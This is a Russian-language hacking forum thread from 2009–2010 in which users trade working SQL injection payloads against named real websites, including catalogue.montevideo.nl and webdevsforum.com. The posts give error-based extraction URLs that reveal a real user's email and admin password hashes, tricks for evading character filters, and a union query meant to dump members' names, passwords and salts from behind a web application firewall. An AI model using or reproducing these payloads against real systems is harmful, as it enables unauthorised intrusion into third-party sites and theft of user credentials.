29.12.2009, 09:32
|
|
Участник форума
Регистрация: 15.05.2009
Сообщений: 111
Провел на форуме:
1179199
Репутация:
127
|
|
Сообщение от v1d0qz
Вот же допустим выводиться..
http://www.drs ervice.ru/service-centers/nn/NNovgorod/drservice52/'and+1=1='2/
да не хрена там не выводится и не будет т.к это бред то что ты пишешь.
читай http://forum.antichat.ru/thread19844.html
|
|
|
29.12.2009, 13:20
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от mental2
Вот немогу понять почему вот так выводиться
http://www.скрыто_по_просьбе_автора. ru/clients/home/business'and+1='1/
а вот так не.
http://www.скрыто_по_просьбе_автора. ru/clients/home/business'and+(SELECT+id+from+catalogue_fin+where+i d=1+LIMIT+1)='1/
Да и вообще как можно раскрутить в данной ситуации, а то уже все перепробывал..
скрипт странно реагирует на точку '.', в связи с чем с ходу не удалось составить запрос в другую базу, зато по ошибке:
in /usr/home/hosting/public_html/webadmin/inc/pvp.php on line 55
находим админку <скрыто>/webadmin/login.php, которая также страдает фрагментированной sqli, но и её не получилось раскрутить в связи с тем что пароль передается в виде md5, зато по выводимомой ошибке можно составить запрос в 1 sqli:
SELECT id, AdminLogin, AdminOpnWin,lock_user,lock_time FROM settings WHERE AdminLogin like binary '\' and AdminPassword='d41d8cd98f00b204e9800998ecf8427e'"
http://www.скрыто_по_просьбе_автора. ru/clients'*ExtractValue(1,concat(1,(select(concat(Ad minLogin,AdminPassword))from(settings)where(id=1)) ))*'1/
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
Последний раз редактировалось l1ght; 02.01.2010 в 23:13..
|
|
|
|
31.12.2009, 17:18
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
А вот значит ещё какая вещь у меня появляется.
Нахожу SQL иньекцию, и всё как по плану, подбираю нужное количество колонок и … приехали. Как только подобрал правильное кол-во столбцов, так сразу-же выскакивает ошибка:
Код:
Unknown table 'codes' in field list
Вот SQL с примером:
http://catalogue.montevideo.nl/code.php?id=-1+union+select+1,2,3--
Количество столбцов точно 3, но ругается на неправильную таблицу и т.д… Эта ошибка встречается мне очень часто, собственно что тут можно сделать, почему так бывает, и реально ли вывести инфу из неё? |
|
|
|
31.12.2009, 18:07
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от Nightmarе
А вот значит ещё какая вещь у меня появляется.
Нахожу SQL иньекцию, и всё как по плану, подбираю нужное количество колонок и … приехали. Как только подобрал правильное кол-во столбцов, так сразу-же выскакивает ошибка:
Код:
Unknown table 'codes' in field list
Вот SQL с примером:
http://catalogue.montevideo.nl/code.php?id=-1+union+select+1,2,3--
Количество столбцов точно 3, но ругается на неправильную таблицу и т.д… Эта ошибка встречается мне очень часто, собственно что тут можно сделать, почему так бывает, и реально ли вывести инфу из неё? http://catalogue.montevideo.nl/code.php?id=-1+and+1=(select+*+from(select+*+from(se lect+name_const((version()),1)a)+as+a+join+(select +name_const((version()),1)c)d)s)--+
|
|
|
|
31.12.2009, 18:32
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от Nightmarе
http://catalogue.montevideo.nl/code.php?id=-1+union+select+1,2,3--
Количество столбцов точно 3, но ругается на неправильную таблицу и т.д… Эта ошибка встречается мне очень часто, собственно что тут можно сделать, почему так бывает, и реально ли вывести инфу из неё?
Не точно 3. Там явно видно, что переменная подставляется в несколько запросов с различным количеством колумнов.
http://catalogue.montevideo.nl/code.php?id=-1+order+by+1,2,3--+
SELECT DISTINCT art.art_ID FROM art INNER JOIN art2code code_id ON art.art_ID = code_id.art_ID INNER JOIN art2code a2c ON art.art_ID = a2c.art_ID INNER JOIN art2code code_publish ON art.art_ID = code_publish.art_ID INNER JOIN codes ON code_publish.code_ID = codes.code_ID WHERE code_id.code_ID = -1 order by 1,2,3-- AND codes.code_GUID = 'MVTBA_pub_web' AND (((a2c.code_ID LIKE 1405 OR a2c.code_ID LIKE 1407 OR a2c.code_ID LIKE 10096 ) ) OR (a2c.code_ID LIKE 1404 ) OR (a2c.code_ID LIKE 1402 ) )
Unknown column '2' in 'order clause'
http://catalogue.montevideo.nl/code.php?id=-1+order+by+1,2,3,4,5,6--+
get_code_info: SELECT codes.text AS code_name, codes.description AS code_description, codes_parent.text AS group_name FROM codes INNER JOIN codes codes_parent ON codes.parent_ID = codes_parent.code_ID WHERE codes.code_ID = -1 order by 1,2,3,4,5,6-- ;
Unknown column '4' in 'order clause'
Инфу можно тащить например так
http://catalogue.montevideo.nl/code.php?id=1+union+select+1,count(*),concat((sele ct+user+from+watsnext.cata_users+limit+1,1),0x3a,f loor(rand(0)*2))+x+from+information_schema.tables+ group+by+x--+
Duplicate entry 'nimk@nimk.nl:1' for key 1
Сообщение от v1d0qz
http://catalogue.montevideo.nl/code.php?id=-1+and+1=(select+*+from(select+*+from(se lect+name_const((version()),1)a)+as+a+join+(select +name_const((version()),1)c)d)s)--+
На что-либо кроме version() будет возвращаться ошибка Incorrect arguments to NAME_CONST. С чем это связано я лично не знаю.
|
|
|
|
31.12.2009, 19:06
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от ElteRUS
На что-либо кроме version() будет возвращаться ошибка Incorrect arguments to NAME_CONST. С чем это связано я лично не знаю.
Я полагаю это косяк функции name_const в этой версии мускуля, т.е. передаваемое как аргумент функции не является постоянным значением (т.е. константой). Вот затестил, если указывать допустим concat(1,0x3a,1), то ошибка, а если просто 1, то ошибка нету. В версии 5.0.32 получилось сделать select table_name в schema, а в 5.0.67 ошибка.
Последний раз редактировалось v1d0qz; 31.12.2009 в 23:05..
|
|
|
|
31.12.2009, 19:35
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от v1d0qz
Собственно есть удаленнка mysql с рут доступом + могу читать все файлы. Какие варианты есть узнать где лежит сайт?
Смотреть таблы с конфигами, возможно будет адрес сайта.
Сообщение от m0Hze
Ох я ебал.Как в болталке тролить так мы в первое рыло,а как статьи почитать религия не позволяет?
Для каждого случая,отдельная диагностика,где то кавычка,где-то скобка.И нельзя вывести точную статистику сколько сайтов мы взломаем из 100, " благоприятные обстоятельства" нужны  Особые условия.
|
|
|
|
05.01.2010, 23:59
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от v1d0qz
Кто раскрутит дубли без символа * ?
Ты о чем?
|
|
|
|
06.01.2010, 17:29
|
|
Участник форума
Регистрация: 18.06.2008
Сообщений: 222
Провел на форуме:
2223440
Репутация:
648
|
|
Сообщение от v1d0qz
Кто раскрутит дубли без символа * ?
Т.е. допустим запрос
or(1,1)=(select+count(*),concat(version(),floor(ra nd(0)*2))from+information_schema.tables+group+by+2 )--+
Нужно сделать без символа '*', потому как он обрезает запрос, ну или он фильтруется, т.е. результат один, с ним запрос не работает.
count(*) замени на count(0).
rand(0)*2 замени на rand(0)/(1/2).
|
|
|
|
07.01.2010, 15:08
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
А что делать когда на сервере стоит WAFF, но ни один способ описанный в "Web_Application_Firewall.ppt" не пашет?
Пример:
Код:
http://www.webdevsforum.com/index.php?page=search&topic=1&pf=1&search=xek&author_id=1&forums[]=1)+union+select+null,null,null,5,concat_ws(0x3a,name,password,pass_salt),null,null,null,null+from+novaboard_members+where+id=1+--+
Так выглядит боевой запрос, который точно должен сработать, но из за WAFF`a не пахает. И ничё нельзя сделать, а если правильнее, то я ничего не смог сделать.
И так по всюду, а точнее на куче сайтов, учитывая то, что с методами обхода WAFF я как бы ознакомился немножко...
Хотя что то мне подсказывает, что помимо него ещё и существует .htaccess со своими регулярными выражениями... |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
